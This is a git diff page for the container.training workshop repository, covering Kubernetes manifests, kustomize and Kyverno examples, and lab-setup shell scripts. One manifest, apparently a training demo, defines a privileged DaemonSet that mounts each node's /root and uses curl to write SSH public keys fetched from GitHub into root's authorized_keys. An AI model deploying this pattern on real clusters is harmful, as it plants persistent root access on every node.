Compare commits

..

2 Commits

Author SHA1 Message Date
Julien Girardin
6a8e00fc7d Change last day schedule of Allo Docker for Julien 2023-05-30 15:44:33 +02:00
Jérôme Petazzoni
e8c2b29c8f ⚛️ HighFive 2023Q2 content update 2023-05-29 14:54:07 +02:00
256 changed files with 3448 additions and 18081 deletions

View File

@@ -1,26 +0,0 @@
{
"name": "container.training environment to get started with Docker and/or Kubernetes",
"image": "ghcr.io/jpetazzo/shpod",
"features": {
//"ghcr.io/devcontainers/features/common-utils:2": {}
},
// Use 'forwardPorts' to make a list of ports inside the container available locally.
"forwardPorts": [],
//"postCreateCommand": "... install extra packages...",
"postStartCommand": "dind.sh",
// This lets us use "docker-outside-docker".
// Unfortunately, minikube, kind, etc. don't work very well that way;
// so for now, we'll likely use "docker-in-docker" instead (with a
// privilege dcontainer). But we're still exposing that socket in case
// someone wants to do something interesting with it.
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
// This is for docker-in-docker.
"privileged": true,
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
"remoteUser": "k8s"
}

1
.gitignore vendored
View File

@@ -9,7 +9,6 @@ prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www
slides/*.yml.html

View File

@@ -1,7 +1,7 @@
FROM ruby:alpine
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install thin --version '~> 1'
RUN gem install sinatra
RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80

View File

@@ -1,5 +1,5 @@
FROM node:4-slim
RUN npm install express@4
RUN npm install express
RUN npm install redis@3
COPY files/ /files/
COPY webui.js /

View File

@@ -1,33 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 1
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- name: "80"
port: 80
selector:
app: blue

View File

@@ -16,7 +16,8 @@ spec:
hostPath:
path: /root
tolerations:
- operator: Exists
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
@@ -26,7 +27,7 @@ spec:
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,12 +0,0 @@
# This removes the haproxy Deployment.
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
patches:
- patch: |-
$patch: delete
kind: Deployment
apiVersion: apps/v1
metadata:
name: haproxy

View File

@@ -1,14 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.
components:
- setup
- cleanup

View File

@@ -1,20 +0,0 @@
global
#log stdout format raw local0
#daemon
maxconn 32
defaults
#log global
timeout client 1h
timeout connect 1h
timeout server 1h
mode http
option abortonclose
frontend metrics
bind :9000
http-request use-service prometheus-exporter
frontend ollama_frontend
bind :8000
default_backend ollama_backend
maxconn 16
backend ollama_backend
server ollama_server localhost:11434 check

View File

@@ -1,39 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: haproxy
name: haproxy
spec:
selector:
matchLabels:
app: haproxy
template:
metadata:
labels:
app: haproxy
spec:
volumes:
- name: haproxy
configMap:
name: haproxy
containers:
- image: haproxy:3.0
name: haproxy
volumeMounts:
- name: haproxy
mountPath: /usr/local/etc/haproxy
readinessProbe:
httpGet:
port: 9000
ports:
- name: haproxy
containerPort: 8000
- name: metrics
containerPort: 9000
resources:
requests:
cpu: 0.05
limits:
cpu: 1

View File

@@ -1,75 +0,0 @@
# This adds a sidecar to the ollama Deployment, by taking
# the pod template and volumes from the haproxy Deployment.
# The idea is to allow to run ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separetely, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed to append or
# merge lists in "replacements"; but it doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed to perform
# a strategic merge using a fieldPath as the source, because
# we could merge both the containers and the volumes in a
# single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable so we decided to not do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# a restartPolicy=Always).
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
resources:
- haproxy.yaml
configMapGenerator:
- name: haproxy
files:
- haproxy.cfg
replacements:
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.volumes.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.volumes.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.containers.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
targets:
- select:
kind: Service
name: ollama
fieldPaths:
- spec.ports.[name=11434].targetPort

View File

@@ -1,34 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 2
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- port: 80
selector:
app: blue

View File

@@ -1,94 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml
buildMetadata:
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel
# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
# ref (tag, branch...) it was.
- originAnnotations
# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations
# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so that basically, if the ConfigMap is edited, any workload
# using that ConfigMap will automatically do a rolling update.
configMapGenerator:
- name: ollama
literals:
- "model=gemma3:270m"
- "prompt=If you visit Paris, I suggest that you"
- "queue=4"
name: ollama
patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example belows add CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
apiVersion: apps/v1
kind: Deployment
metadata:
name: ollama
spec:
template:
spec:
containers:
- name: ollama
resources:
requests:
cpu: 1
limits:
cpu: 2
# This will have the same effect, with one little detail:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
# kind: Deployment
# name: ollama
# patch: |
# - op: add
# path: /spec/template/spec/containers/0/resources
# value:
# requests:
# cpu: 1
# limits:
# cpu: 2
# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key different, though:
# - a "base" will be evaluated in isolation: it will
# generate+transform some resources, then these resources
# will be included in the main Kustomization;
# - a "component" has access to all the resources that
# have been generated by the main Kustomization, which
# means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar

View File

@@ -1,73 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: ollama
name: ollama
spec:
selector:
matchLabels:
app: ollama
template:
metadata:
labels:
app: ollama
spec:
volumes:
- name: ollama
hostPath:
path: /opt/ollama
type: DirectoryOrCreate
containers:
- image: ollama/ollama
name: ollama
env:
- name: OLLAMA_MAX_QUEUE
valueFrom:
configMapKeyRef:
name: ollama
key: queue
- name: MODEL
valueFrom:
configMapKeyRef:
name: ollama
key: model
volumeMounts:
- name: ollama
mountPath: /root/.ollama
lifecycle:
postStart:
exec:
command:
- /bin/sh
- -c
- ollama pull $MODEL
livenessProbe:
httpGet:
port: 11434
readinessProbe:
exec:
command:
- /bin/sh
- -c
- ollama show $MODEL
ports:
- name: ollama
containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
labels:
app: ollama
name: ollama
spec:
ports:
- name: "11434"
port: 11434
protocol: TCP
targetPort: 11434
selector:
app: ollama
type: ClusterIP

View File

@@ -1,5 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis

View File

@@ -1,13 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
apiVersion: builtin
kind: PrefixSuffixTransformer
metadata:
name: use-ghcr-io
prefix: ghcr.io/
fieldSpecs:
- path: spec/template/spec/containers/image

View File

@@ -1,125 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,4 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- redis.yaml

View File

@@ -1,35 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,30 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
targets:
- select:
kind: Deployment
labelSelector: "app in (hasher,rng,webui,worker)"
# It will soon be possible to use regexes in replacement selectors,
# meaning that the "labelSelector:" above can be replaced with the
# following "name:" selector which is a tiny bit simpler:
#name: hasher|rng|webui|worker
# Regex support in replacement selectors was added by this PR:
# https://github.com/kubernetes-sigs/kustomize/pull/5863
# This PR was merged in August 2025, but as of October 2025, the
# latest release of Kustomize is 5.7.1, which was released in July.
# Hopefully the feature will be available in the next release :)
# Another possibility would be to select all Deployments, and then
# reject the one(s) for which we don't want to update the registry;
# for instance:
#reject:
# kind: Deployment
# name: redis
fieldPaths:
- spec.template.spec.containers.*.image
options:
delimiter: "/"
index: 0

View File

@@ -3,6 +3,7 @@ kind: ClusterPolicy
metadata:
name: pod-color-policy-1
spec:
validationFailureAction: enforce
rules:
- name: ensure-pod-color-is-valid
match:
@@ -17,6 +18,5 @@ spec:
operator: NotIn
values: [ red, green, blue ]
validate:
failureAction: Enforce
message: "If it exists, the label color must be red, green, or blue."
deny: {}

View File

@@ -3,6 +3,7 @@ kind: ClusterPolicy
metadata:
name: pod-color-policy-2
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
@@ -21,7 +22,6 @@ spec:
operator: NotEquals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be changed."
deny:
conditions:

View File

@@ -3,6 +3,7 @@ kind: ClusterPolicy
metadata:
name: pod-color-policy-3
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
@@ -21,6 +22,7 @@ spec:
operator: Equals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be removed."
deny: {}
deny:
conditions:

View File

@@ -1,13 +0,0 @@
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
name: my-pdb
spec:
#minAvailable: 2
#minAvailable: 90%
maxUnavailable: 1
#maxUnavailable: 10%
selector:
matchLabels:
app: my-app

View File

@@ -1,27 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: sysctl
spec:
selector:
matchLabels:
app: sysctl
template:
metadata:
labels:
app: sysctl
spec:
tolerations:
- operator: Exists
initContainers:
- name: sysctl
image: alpine
securityContext:
privileged: true
command:
- sysctl
- fs.inotify.max_user_instances=99999
containers:
- name: pause
image: registry.k8s.io/pause:3.8

View File

@@ -59,27 +59,6 @@ You don't **have to** install the CLI tools of the cloud provider(s) that you wa
If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.
Here is where we look for credentials for each provider:
- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
- Civo: CLI configuration file (`~/.civo.json`)
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
- Google Cloud: we're using "Application Default Credentials (ADC)"; run `gcloud auth application-default login`; note that we'll use the default "project" set in `gcloud` unless you set the `GOOGLE_PROJECT` environment variable
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
- Linode: CLI configuration file (`~/.config/linode-cli`)
- OpenStack: you will need to write a tfvars file (check [that exemple](terraform/virtual-machines/openstack/tfvars.example))
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)
[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
## General Workflow
- fork/clone repo

View File

@@ -21,11 +21,6 @@ digitalocean-pvc)
jq '.[] | select(.name | startswith("pvc-")) | .id' |
xargs -n1 -P10 doctl compute volume delete --force
;;
scaleway-pvc)
scw instance volume list --output json |
jq '.[] | select(.name | contains("_pvc-")) | .id' |
xargs -n1 -P10 scw instance volume delete
;;
*)
echo "Unknown combination of provider ('$1') and resource ('$2')."
;;

View File

@@ -10,22 +10,13 @@ fi
. ~/creds/creds.cloudflare.dns
cloudflare() {
case "$1" in
GET|POST|DELETE)
METHOD="$1"
shift
;;
*)
METHOD=""
;;
esac
URI=$1
shift
http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
http https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
}
_list_zones() {
cloudflare zones?per_page=100 | jq -r .result[].name
cloudflare zones | jq -r .result[].name
}
_get_zone_id() {
@@ -41,15 +32,6 @@ _populate_zone() {
done
}
_clear_zone() {
ZONE_ID=$(_get_zone_id $1)
for RECORD_ID in $(
cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
); do
cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
done
}
_add_zone() {
cloudflare zones "name=$1"
}

View File

@@ -1,9 +1,7 @@
#!/bin/sh
set -eu
# https://open-api.netlify.com/#tag/dnsZone
[ "${1-}" ] || {
[ "$1" ] || {
echo ""
echo "Add a record in Netlify DNS."
echo "This script is hardcoded to add a record to container.training".
@@ -14,13 +12,13 @@ set -eu
echo "$0 del <recordid>"
echo ""
echo "Example to create a A record for eu.container.training:"
echo "$0 add eu A 185.145.250.0"
echo "$0 add eu 185.145.250.0"
echo ""
exit 1
}
NETLIFY_CONFIG_FILE=~/.config/netlify/config.json
if ! [ "${DOMAIN-}" ]; then
if ! [ "$DOMAIN" ]; then
DOMAIN=container.training
fi
@@ -51,29 +49,27 @@ ZONE_ID=$(netlify dns_zones |
_list() {
netlify dns_zones/$ZONE_ID/dns_records |
jq -r '.[] | select(.type=="A" or .type=="AAAA") | [.hostname, .type, .value, .id] | @tsv' |
sort |
column --table
jq -r '.[] | select(.type=="A") | [.hostname, .type, .value, .id] | @tsv'
}
_add() {
NAME=$1.$DOMAIN
TYPE=$2
VALUE=$3
ADDR=$2
# It looks like if we create two identical records, then delete one of them,
# Netlify DNS ends up in a weird state (the name doesn't resolve anymore even
# though it's still visible through the API and the website?)
if netlify dns_zones/$ZONE_ID/dns_records |
jq '.[] | select(.hostname=="'$NAME'" and .type=="'$TYPE'" and .value=="'$VALUE'")' |
jq '.[] | select(.hostname=="'$NAME'" and .type=="A" and .value=="'$ADDR'")' |
grep .
then
echo "It looks like that record already exists. Refusing to create it."
exit 1
fi
netlify dns_zones/$ZONE_ID/dns_records type=$TYPE hostname=$NAME value=$VALUE ttl=300
netlify dns_zones/$ZONE_ID/dns_records type=A hostname=$NAME value=$ADDR ttl=300
netlify dns_zones/$ZONE_ID/dns_records |
jq '.[] | select(.hostname=="'$NAME'")'
@@ -92,7 +88,7 @@ case "$1" in
_list
;;
add)
_add $2 $3 $4
_add $2 $3
;;
del)
_del $2

View File

@@ -1,62 +1,19 @@
#!/bin/sh
#
# Baseline resource usage per vcluster in our usecase:
# 500 MB RAM
# 10% CPU
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
# PRO2-XS = 4 core, 16 gb
#
# With vspod:
# 800 MB RAM
# 33% CPU
#
set -e
KONKTAG=konk
PROVIDER=linode
STUDENTS=5
case "$PROVIDER" in
linode)
export TF_VAR_node_size=g6-standard-6
export TF_VAR_location=fr-par
;;
scaleway)
export TF_VAR_node_size=PRO2-XS
# For tiny testing purposes, these are okay too:
#export TF_VAR_node_size=PLAY2-NANO
export TF_VAR_location=fr-par-2
;;
esac
# deploy big cluster
TF_VAR_node_size=g6-standard-6 \
TF_VAR_nodes_per_cluster=5 \
TF_VAR_location=eu-west \
./labctl create --mode mk8s --settings settings/mk8s.env --provider linode --tag konk
# set kubeconfig file
export KUBECONFIG=~/kubeconfig
if [ "$PROVIDER" = "kind" ]; then
kind create cluster --name $KONKTAG
ADDRTYPE=InternalIP
else
if ! [ -f tags/$KONKTAG/stage2/kubeconfig.101 ]; then
./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag $KONKTAG
fi
cp tags/$KONKTAG/stage2/kubeconfig.101 $KUBECONFIG
ADDRTYPE=ExternalIP
fi
cp tags/konk/stage2/kubeconfig.101 ~/kubeconfig
# set external_ip labels
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="'$ADDRTYPE'")].address}{"\n"}{end}' |
while read node address ignoredaddresses; do
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="ExternalIP")].address}{"\n"}{end}' |
while read node address; do
kubectl label node $node external_ip=$address
done
# vcluster all the things
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students $STUDENTS
# install prometheus stack because that's cool
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
--namespace prom-system --create-namespace \
kube-prometheus-stack kube-prometheus-stack
# and also fix sysctl
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students 27

View File

@@ -57,7 +57,7 @@ need_tag() {
if [ ! -d "tags/$TAG" ]; then
die "Tag $TAG not found (directory tags/$TAG does not exist)."
fi
for FILE in mode provider settings.env status; do
for FILE in settings.env ips.txt; do
if [ ! -f "tags/$TAG/$FILE" ]; then
warning "File tags/$TAG/$FILE not found."
fi

View File

@@ -19,22 +19,20 @@ _cmd_cards() {
TAG=$1
need_tag
OPTIONS_FILE=$2
[ -f "$OPTIONS_FILE" ] || die "Please specify a YAML options file as 2nd argument."
OPTIONS_FILE_PATH="$(readlink -f "$OPTIONS_FILE")"
die FIXME
# This will process logins.jsonl to generate two files: cards.pdf and cards.html
# This will process ips.txt to generate two files: ips.pdf and ips.html
(
cd tags/$TAG
../../../lib/make-login-cards.py "$OPTIONS_FILE_PATH"
../../../lib/ips-txt-to-html.py settings.yaml
)
ln -sf ../tags/$TAG/cards.html www/$TAG.html
ln -sf ../tags/$TAG/cards.pdf www/$TAG.pdf
ln -sf ../tags/$TAG/ips.html www/$TAG.html
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
info "Cards created. You can view them with:"
info "xdg-open tags/$TAG/cards.html tags/$TAG/cards.pdf (on Linux)"
info "open tags/$TAG/cards.html (on macOS)"
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
info "open tags/$TAG/ips.html (on macOS)"
info "Or you can start a web server with:"
info "$0 www"
}
@@ -49,41 +47,6 @@ _cmd_clean() {
done
}
_cmd codeserver "Install code-server on the clusters"
_cmd_codeserver() {
TAG=$1
need_tag
ARCH=${ARCHITECTURE-amd64}
CODESERVER_VERSION=4.96.4
CODESERVER_URL=https://github.com/coder/code-server/releases/download/v${CODESERVER_VERSION}/code-server-${CODESERVER_VERSION}-linux-${ARCH}.tar.gz
pssh "
set -e
i_am_first_node || exit 0
if ! [ -x /usr/local/bin/code-server ]; then
curl -fsSL $CODESERVER_URL | sudo tar zx -C /opt
sudo ln -s /opt/code-server-${CODESERVER_VERSION}-linux-${ARCH}/bin/code-server /usr/local/bin/code-server
sudo -u $USER_LOGIN -H code-server --install-extension ms-azuretools.vscode-docker
sudo -u $USER_LOGIN -H code-server --install-extension ms-kubernetes-tools.vscode-kubernetes-tools
sudo -u $USER_LOGIN -H mkdir -p /home/$USER_LOGIN/.local/share/code-server/User
echo '{\"workbench.startupEditor\": \"terminal\"}' | sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.local/share/code-server/User/settings.json
sudo -u $USER_LOGIN mkdir -p /home/$USER_LOGIN/.config/systemd/user
sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.config/systemd/user/code-server.service <<EOF
[Unit]
Description=code-server
[Install]
WantedBy=default.target
[Service]
ExecStart=/usr/local/bin/code-server --bind-addr [::]:1789
Restart=always
EOF
sudo systemctl --user -M $USER_LOGIN@ enable code-server.service --now
sudo loginctl enable-linger $USER_LOGIN
fi"
}
_cmd createuser "Create the user that students will use"
_cmd_createuser() {
TAG=$1
@@ -163,7 +126,6 @@ set number
set shiftwidth=2
set softtabstop=2
set nowrap
set laststatus=2
SQRL
pssh -I "sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.tmux.conf" <<SQRL
@@ -270,27 +232,7 @@ _cmd_create() {
ln -s ../../$SETTINGS tags/$TAG/settings.env.orig
cp $SETTINGS tags/$TAG/settings.env
# For Google Cloud, it is necessary to specify which "project" to use.
# Unfortunately, the Terraform provider doesn't seem to have a way
# to detect which Google Cloud project you want to use; it has to be
# specified one way or another. Let's decide that it should be set with
# the GOOGLE_PROJECT env var; and if that var is not set, we'll try to
# figure it out from gcloud.
# (See https://github.com/hashicorp/terraform-provider-google/issues/10907#issuecomment-1015721600)
# Since we need that variable to be set each time we'll call Terraform
# (e.g. when destroying the environment), let's save it to the settings.env
# file.
if [ "$PROVIDER" = "googlecloud" ]; then
if ! [ "$GOOGLE_PROJECT" ]; then
info "PROVIDER=googlecloud but GOOGLE_PROJECT is not set. Detecting it."
GOOGLE_PROJECT=$(gcloud config get project)
info "GOOGLE_PROJECT will be set to '$GOOGLE_PROJECT'."
fi
echo "export GOOGLE_PROJECT=$GOOGLE_PROJECT" >> tags/$TAG/settings.env
fi
. tags/$TAG/settings.env
. $SETTINGS
echo $MODE > tags/$TAG/mode
echo $PROVIDER > tags/$TAG/provider
@@ -314,12 +256,21 @@ _cmd_create() {
terraform init
echo tag = \"$TAG\" >> terraform.tfvars
echo how_many_clusters = $STUDENTS >> terraform.tfvars
if [ "$CLUSTERSIZE" ]; then
echo nodes_per_cluster = $CLUSTERSIZE >> terraform.tfvars
echo nodes_per_cluster = $CLUSTERSIZE >> terraform.tfvars
for RETRY in 1 2 3; do
if terraform apply -auto-approve; then
touch terraform.ok
break
fi
done
if ! [ -f terraform.ok ]; then
die "Terraform failed."
fi
)
sep
info "Successfully created $COUNT instances with tag $TAG"
echo create_ok > tags/$TAG/status
# If the settings.env file has a "STEPS" field,
# automatically execute all the actions listed in that field.
@@ -369,11 +320,10 @@ _cmd_clusterize() {
pssh "
set -e
grep PSSH_ /etc/ssh/sshd_config || echo 'AcceptEnv PSSH_*' | sudo tee -a /etc/ssh/sshd_config
grep KUBECOLOR_ /etc/ssh/sshd_config || echo 'AcceptEnv KUBECOLOR_*' | sudo tee -a /etc/ssh/sshd_config
sudo systemctl restart ssh.service"
pssh -I < tags/$TAG/clusters.tsv "
grep -w \$PSSH_HOST | tr '\t' '\n' > /tmp/cluster"
pssh -I < tags/$TAG/clusters.txt "
grep -w \$PSSH_HOST | tr ' ' '\n' > /tmp/cluster"
pssh "
echo \$PSSH_HOST > /tmp/ipv4
head -n 1 /tmp/cluster | sudo tee /etc/ipv4_of_first_node
@@ -394,14 +344,6 @@ _cmd_clusterize() {
done < /tmp/cluster
"
jq --raw-input --compact-output \
